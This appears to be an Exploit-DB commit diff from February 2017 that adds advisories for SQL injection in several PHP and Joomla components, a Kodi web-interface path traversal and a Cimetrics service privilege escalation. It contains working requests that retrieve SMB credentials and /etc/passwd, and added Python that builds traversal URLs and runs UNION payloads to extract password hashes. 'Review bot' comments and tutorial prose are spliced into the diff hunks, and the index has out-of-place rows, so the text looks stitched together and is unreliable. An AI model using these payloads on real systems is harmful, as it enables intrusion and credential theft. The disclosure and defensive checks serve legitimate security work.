DB: 2017-02-13

19 new exploits

Cimetrics BACstac 6.2f - Privilege Escalation
Cimetrics BACnet Explorer 4.0 - XML External Entity Injection
SonicDICOM PACS 2.3.2 - Cross-Site Scripting
SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)
SonicDICOM PACS 2.3.2 - Privilege Escalation
Kodi 17.1 - Arbitrary File Disclosure
WhizBiz 1.9 - SQL Injection
TI Online Examination System 2.0 - SQL Injection
Viavi Real Estate - SQL Injection
Viavi Movie Review - 'id' Parameter SQL Injection
Viavi Product Review - 'id' Parameter SQL Injection
Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection
Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection
Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection
Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection
Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection
Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection
Joomla! Component Vik Booking 1.7 - SQL Injection
Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection
Offensive Security 2017-02-13 05:01:18 +00:00
parent 187fb60098
commit 8b6bfd7f93
20 changed files with 622 additions and 0 deletions


@ -8790,6 +8790,8 @@ id,file,description,date,author,platform,type,port
41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
41265,platforms/windows/local/41265.py,"IVPN Client 2.6.1 - Privilege Escalation",2017-02-06,"Kacper Szurek",windows,local,0
41320,platforms/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Privilege Escalation",2017-02-12,LiquidWorm,windows,local,0
41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
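Review bot: the 41320 row's description ('Cimetrics BACstac 6.2f - Privilege Escalation') drops both the component and the bug class that the advisory file itself gives: platforms/windows/local/41320.txt is titled 'Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation' and describes an unquoted service binary path plus a world-writable named pipe. The other new rows in this commit name their vector ('XML External Entity Injection', ''tag' Parameter SQL Injection'), so 'Cimetrics BACstac Routing Service 6.2f - Unquoted Service Path Privilege Escalation' would keep the index consistent and searchable by bug class.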
@ -37228,3 +37230,20 @@ id,file,description,date,author,platform,type,port
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41308,platforms/php/webapps/41308.txt,"WordPress 4.7.0/4.7.1 Plugin Insert PHP - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
41310,platforms/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,windows,webapps,0
41311,platforms/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,windows,webapps,0
41312,platforms/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",linux,webapps,0
41313,platforms/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41314,platforms/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41315,platforms/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41316,platforms/php/webapps/41316.txt,"Viavi Movie Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41317,platforms/php/webapps/41317.txt,"Viavi Product Review - 'id' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41318,platforms/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41319,platforms/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' Parameter SQL Injection",2017-02-12,"Ihsan Sencan",php,webapps,0
41322,platforms/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41323,platforms/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41324,platforms/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41325,platforms/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41326,platforms/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
41327,platforms/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' Parameter SQL Injection",2017-02-11,"Persian Hack Team",php,webapps,0
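Review bot: two description/file mismatches in this hunk. The 41312 row says 'Kodi 17.1 - Arbitrary File Disclosure' while the file's own title line is 'Kodi - Local File Inclusion', and the file header names the vulnerable component as the Chorus 2.4.2 web interface; the row's wording (file disclosure, the server returns file bytes) is the accurate one, so the file title should be aligned with it and the component added, e.g. 'Kodi 17.1 (Chorus 2.4.2) - Arbitrary File Disclosure'. The 41326 row ('Joomla! Component Vik Booking 1.7 - SQL Injection') is the only Persian Hack Team row without its parameter although 41326.txt names it ('room_ids[0]'); ''room_ids[0]' Parameter SQL Injection' would match the sibling rows.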


platforms/linux/webapps/41312.txt

@ -0,0 +1,54 @@
# Exploit Title: Kodi - Local File Inclusion
# Date: 12 February 2017
# Exploit Author: Eric Flokstra
# Vendor Homepage: https://kodi.tv/
# Software Link: https://kodi.tv/download/
# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
# Tested on: Linux
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation. Chorus is a web interface
for controlling and interacting with Kodi. It is hosted by the Kodi
installation.
The web interface loads a thumbnail of an image, video or add-on when
selecting a category in the left menu with the following request:
http://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F
Insufficient validation of user input is performed on this URL, resulting
in a local file inclusion vulnerability (in effect an arbitrary file read:
the server returns the file's bytes rather than executing them). This enables
attackers to retrieve arbitrary files from the filesystem by changing the
location after the '/image/image%3A%2F%2F' part.
<--Examples-->
1) If Kodi is connected to a NAS the following request can be used to obtain plain text SMB credentials:
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
Response:
<passwords><path><from pathversion="1">smb://192.168.1.15/</from><to
pathversion="1">smb://username:password@192.168.1.15//share</to></path></passwords>
2) Request to retrieve the content of /etc/passwd:
http://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
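The requests above are double-encoded: the target path is percent-encoded once, wrapped in Kodi's image:// special URL, and the whole thing is encoded again (which is why they contain %252f, an encoded %2f). The following Python is an added example, not part of the advisory or of Kodi/Chorus: it builds such a URL for any target path, reverses both decoding layers to show what path the server ends up with (the assumption being that the HTTP path is decoded first and the image:// payload second, as the captured requests imply), and applies the allow-list check a fixed thumbnail endpoint should make. The sample requests are copied from the advisory; the allowed root is an assumption.

```python
from pathlib import PurePosixPath
from urllib.parse import quote, unquote

CHORUS_IMAGE_PREFIX = "/image/"   # Chorus thumbnail endpoint seen in the advisory
SPECIAL_SCHEME = "image://"       # Kodi "special" URL carried inside the HTTP path


def build_image_url(host, inner_path, traversal=".."):
    """Build a Chorus /image/ URL the way the advisory's requests are built:
    target path encoded once, prefixed with the traversal segment, wrapped in
    image://, then the whole special URL encoded again."""
    special = SPECIAL_SCHEME + traversal + quote(inner_path, safe="")
    return f"http://{host}{CHORUS_IMAGE_PREFIX}{quote(special, safe='')}"


def resolve_image_special(request_path):
    """Reverse both layers: what path is left after the two decodes.
    (Assumption: HTTP path decode first, image:// payload decode second.)"""
    if not request_path.startswith(CHORUS_IMAGE_PREFIX):
        raise ValueError("not a Chorus image request")
    special = unquote(request_path[len(CHORUS_IMAGE_PREFIX):])
    if not special.startswith(SPECIAL_SCHEME):
        raise ValueError("not an image:// special URL")
    return unquote(special[len(SPECIAL_SCHEME):])


def is_allowed_thumbnail(resolved_path, allowed_roots):
    """Hardened check (added here, not Kodi's code): the decoded path must be
    absolute, contain no '..' segment, and sit under a permitted root."""
    p = PurePosixPath(resolved_path)
    if not p.is_absolute() or ".." in p.parts:
        return False
    roots = [PurePosixPath(r) for r in allowed_roots]
    return any(root == p or root in p.parents for root in roots)


if __name__ == "__main__":
    # Constructed: the advisory's /etc/passwd request and its legitimate thumbnail request.
    poc = "/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
    thumb = ("/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons"
             "%252fplugin.video.vice%252ficon.png%2F")
    roots = ["/home/osmc/.kodi/addons"]   # assumed allow-list for thumbnails
    for req in (poc, thumb):
        target = resolve_image_special(req)
        print(f"{target!r:60} allowed={is_allowed_thumbnail(target, roots)}")
    print(build_image_url("192.168.1.25:8080", "/home/osmc/.kodi/userdata/passwords.xml"))
```

The important detail for both the tester and the fixer is that a check applied before the second decode sees `..%2fetc%2fpasswd` and may not recognise it as traversal; the allow-list has to run on the fully decoded path.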

platforms/php/webapps/41313.txt

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: WhizBiz - Business Directory CMS v1.9 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://webhelios.com/
# Software Buy: https://codecanyon.net/item/whizbiz-business-directory-cms/12931569
# Demo: http://whizbiz.webhelios.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/en/results/plainkey=[SQL]
# # # # #

platforms/php/webapps/41314.txt

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: TI Online Examination System v2.0 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://textusintentio.com/
# Software Buy: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Demo: http://oesv2.textusintentio.com/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as student user
# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
# http://localhost/[PATH]/center/student_edit.php?s_id=[SQL]
# http://localhost/[PATH]/center/edit_notice.php?n_id=[SQL]
# http://localhost/[PATH]/center/exam_edit.php?p_e_id=[SQL]
# Etc..
# # # # #

platforms/php/webapps/41315.txt

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Viavi Real Estate - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://viavilab.com/
# Software Buy: https://codecanyon.net/item/viavi-real-estate/11217313
# Demo: http://viavilab.com/codecanyon/real_estate_demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/property-detail.php?pid=[SQL]
# http://localhost/[PATH]/buysalerent.php?sort=[SQL]
# Etc..
# # # # #

platforms/php/webapps/41316.txt

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Viavi Movie Review - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://viavilab.com/
# Software Buy: https://codecanyon.net/item/movie-review/12729570
# Demo: http://viavilab.com/codecanyon/movie_review_demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/genres.php?id=[SQL]
# Etc..
# # # # #

platforms/php/webapps/41317.txt

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Viavi Product Review - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://viavilab.com/
# Software Buy: https://codecanyon.net/item/product-review/12406163
# Demo: http://viavilab.com/codecanyon/product_review_demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/category.php?id=[SQL]
# Etc..
# # # # #

platforms/php/webapps/41318.txt

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Quadz School Management System v3.1 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://awardcorporation.com/
# Software Buy: https://codecanyon.net/item/quadz-school-management-system/10452009
# Demo: http://mass.awardcorporation.com/
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as student user
# http://localhost/[PATH]/index.php/sclass/ownClassRoutin?uisd=[SQL]
# http://localhost/[PATH]/index.php/suggestion/own_suggestion?uisd=[SQL]
# # # # #

platforms/php/webapps/41319.txt

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Domains & Hostings Manager PRO v 3.0 - SQL Injection
# Google Dork: N/A
# Date: 12.02.2017
# Vendor Homepage: http://endavi.com/
# Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735
# Demo: http://endavi.com/dhrpro_demo/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/list.php?entries=[SQL]
# http://localhost/[PATH]/edit.php?entries=[SQL]
# # # # #

platforms/php/webapps/41322.txt

@ -0,0 +1,16 @@
# Exploit Title: Joomla Component onisPetitions 2.5 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onispetitions/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# POC :
# tag Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_onispetitions&view=petitions&tag=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

platforms/php/webapps/41323.txt

@ -0,0 +1,16 @@
# Exploit Title: Joomla Component onisQuotes 2.5 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/news-display/quotes/onisquotes/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# POC :
# tag Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_onisquotes&view=quotes&tag=[SQL]&Itemid=180
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

platforms/php/webapps/41324.txt

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component onisMusic 2 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/onismusic/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:option=com_onismusic
# Tested on: Linux
# POC :
# tag Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_onismusic&view=songs&tag=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

platforms/php/webapps/41325.txt

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component Sponsor Wall 7.0 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_sponsorwall
# Tested on: Linux
# POC :
# wallid Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

platforms/php/webapps/41326.txt

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component Vik Booking 1.7 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extension/vik-booking/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_vikbooking
# Tested on: Linux
# POC :
# room_ids[0] Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_vikbooking&view=availability&room_ids[0]=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

platforms/php/webapps/41327.txt

@ -0,0 +1,17 @@
# Exploit Title: Joomla Component Soccer Bet 4.1.5 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_soccerbet
# Tested on: Linux
# POC :
# Cat Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_soccerbet&view=matches&cat=[SQL]
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers
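The SQL injection advisories in this commit (the Ihsan Sencan entries 41313 to 41319 and the Persian Hack Team entries 41322 to 41327) give only URL templates, with the injection point in either a numeric context (genres.php?id=[SQL], category.php?id=[SQL], wallid=[SQL]) or a string context (tag=[SQL]). The following Python is an added example and not code from any of those applications: it reproduces both patterns against an in-memory SQLite database with a constructed schema, shows a UNION payload pulling rows from another table in each context, shows the bound-parameter fix, and includes the boolean tautology check a tester uses to triage a suspected parameter without dumping data. The tables, rows and payloads are all made up for the demo.

```python
import sqlite3

# Constructed schema and data standing in for the PHP apps above; the advisories give
# only URL templates (e.g. genres.php?id=[SQL], ...&tag=[SQL]), not the real tables.
SCHEMA = """
CREATE TABLE genres (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE songs  (id INTEGER PRIMARY KEY, title TEXT, tag TEXT);
CREATE TABLE users  (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO genres VALUES (1, 'Drama'), (2, 'Comedy');
INSERT INTO songs  VALUES (1, 'Intro', 'rock'), (2, 'Outro', 'jazz');
INSERT INTO users  VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# Payloads as they would follow ?id= and &tag= in the URL (before percent-encoding).
UNION_PAYLOAD_NUMERIC = "-1 UNION SELECT username || ':' || password_hash FROM users"
UNION_PAYLOAD_STRING = "x' UNION SELECT username || ':' || password_hash FROM users -- "


def open_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def genre_name_vulnerable(conn, id_param):
    """Numeric context: the value is pasted straight into the statement (the ?id=[SQL] case)."""
    return [r[0] for r in conn.execute("SELECT name FROM genres WHERE id = " + id_param)]


def genre_name_fixed(conn, id_param):
    """Same lookup, type-checked and bound; the database never sees SQL inside the value."""
    try:
        gid = int(id_param)
    except ValueError:
        return []
    return [r[0] for r in conn.execute("SELECT name FROM genres WHERE id = ?", (gid,))]


def songs_by_tag_vulnerable(conn, tag):
    """String context: the value sits between quotes, so the payload closes the quote,
    appends its own query and comments out the trailing quote (the &tag=[SQL] case)."""
    return [r[0] for r in conn.execute("SELECT title FROM songs WHERE tag = '" + tag + "'")]


def songs_by_tag_fixed(conn, tag):
    """Bound parameter: the quote in the payload is just data."""
    return [r[0] for r in conn.execute("SELECT title FROM songs WHERE tag = ?", (tag,))]


def boolean_oracle(lookup, base="1"):
    """Triage for a suspected numeric parameter: a true and a false tautology appended
    to the same id must give the same response unless the clause is evaluated as SQL.
    `lookup` is a one-argument function that performs the request and returns its result."""
    return lookup(base + " AND 1=1") != lookup(base + " AND 1=2")


if __name__ == "__main__":
    db = open_demo_db()
    print("vulnerable numeric:", genre_name_vulnerable(db, UNION_PAYLOAD_NUMERIC))
    print("fixed numeric:     ", genre_name_fixed(db, UNION_PAYLOAD_NUMERIC))
    print("vulnerable string: ", songs_by_tag_vulnerable(db, UNION_PAYLOAD_STRING))
    print("oracle, vulnerable handler:", boolean_oracle(lambda p: genre_name_vulnerable(db, p)))
    print("oracle, fixed handler:     ", boolean_oracle(lambda p: genre_name_fixed(db, p)))
```

Against a live target the `lookup` passed to `boolean_oracle` would be the HTTP request for the advisory's URL with the parameter substituted; comparing the two responses is enough to confirm the finding and is far less noisy than a UNION dump.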

platforms/windows/local/41320.txt

@ -0,0 +1,101 @@
Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 6.2f
Summary: BACstac belongs to product BACstac(TM) Networking Software and
was developed by company Cimetrics Inc. Cimetrics is excited to announce
a new version of our industry-leading BACnet protocol stack: BACstac 6.8.
The Cimetrics BACstac saves man-years of development when your company needs
to create a BACnet solution ! Our software team has created a set of BACnet
libraries which greatly simplify the task of interfacing to BACnet.
Even the largest companies in the HVAC industry use our code because it is
a very complex and time consuming task keeping up with the ongoing changes
that are taking place in the BACnet committees. For example, many hundreds
of protocol modifications, requirements, and enhancements have taken place
in just the past year. By purchasing the Cimetrics BACstac solution, we do
the compatibility coding and testing. This typically saves man-years of
software developer time EVERY YEAR !
Desc: The application suffers from an unquoted search path issue impacting
the service 'bacstac' (bacstac-gtw.exe) for Windows deployed as part of BACstac
routing service solution. This could potentially allow an authorized but non-privileged
local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local users code would execute with the elevated privileges
of the application.
BACstac also provides a named pipe used for IPC connection between a BACstac
application and the BACstac service.
The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
IPC mechanism was chosen to allow portability to embedded systems, and it uses a
fixed number of slots. The slots are recycled when an application stops running.
With Object-based multiplexing, Service requests that identify a particular Object
(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
the BACstac API.
A number of BACstac protocol stack run-time configuration parameters are stored
in the Windows Registry. These values are created and initialized when the protocol
stack is installed. The registry entries are not completely removed when the protocol
stack is uninstalled (this is standard behaviour for .INF files). The Registry
entries are located in:
HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
The named pipe is also created with improper permissions: the 'Everyone' group
has the 'F' (Full) flag, which accesschk reports below as 'RW Everyone'.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5397
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
13.12.2016
--
C:\>sc qc bacstac
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bacstac
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BACstac Protocol
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
C:\>accesschk.exe \pipe\bacstac
Accesschk v6.02 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\bacstac
RW Everyone
C:\>
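The two findings above are both read straight off tool output: an unquoted BINARY_PATH_NAME containing spaces for a service that starts automatically as LocalSystem, and a named pipe writable by Everyone. The following Python is an added example, not part of the advisory or of BACstac: it parses `sc qc` and accesschk output (the constructed copies below are transcribed from the advisory's output), lists the file names CreateProcess would try before the real binary (each prefix of the path that ends at a space, with .exe appended), and flags the pipe ACL. Indentation of the sample `sc qc` text is an assumption about the tool's layout and does not affect the parser.

```python
import re

# Constructed from the advisory's `sc qc bacstac` and accesschk output above.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bacstac
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BACstac Protocol
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

ACCESSCHK_OUTPUT = r"""
\\.\Pipe\bacstac
  RW Everyone
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict FIELD -> value (empty string when blank)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def hijack_candidates(binary_path):
    """Files CreateProcess tries before the real one when the path is unquoted and
    contains spaces: each prefix ending at a space, with .exe appended. A quoted or
    space-free path has nothing to hijack and yields []."""
    if binary_path.startswith('"') or " " not in binary_path:
        return []
    return [binary_path[:i] + ".exe" for i, ch in enumerate(binary_path) if ch == " "]


def pipe_world_writable(accesschk_text):
    """True when accesschk shows Everyone with write access (W or RW) on the object."""
    return any(re.match(r"\s*R?W\s+Everyone\s*$", line)
               for line in accesschk_text.splitlines())


def assess_service(sc_text):
    """Summarise the unquoted-path exposure of one service from its `sc qc` output."""
    f = parse_sc_qc(sc_text)
    cands = hijack_candidates(f.get("BINARY_PATH_NAME", ""))
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as": f.get("SERVICE_START_NAME"),
        "auto_start": "AUTO_START" in f.get("START_TYPE", ""),
        "unquoted_path": bool(cands),
        "hijack_candidates": cands,
    }


if __name__ == "__main__":
    info = assess_service(SC_QC_OUTPUT)
    for k, v in info.items():
        print(f"{k:18} {v}")
    print("pipe writable by Everyone:", pipe_world_writable(ACCESSCHK_OUTPUT))
```

The candidate list is only the first half of the check: the path is exploitable by a standard user only where that user can create one of the candidate files, which on a default install is not the case for C:\ or C:\Program Files (x86); confirm with `accesschk -w -d` on each candidate's parent directory before calling it a local privilege escalation. The pipe finding is independent of that: RW for Everyone means any local account can connect to the IPC endpoint of a service running as LocalSystem.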

platforms/windows/local/41321.txt

@ -0,0 +1,55 @@
Cimetrics BACnet Explorer 4.0 XXE Vulnerability
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
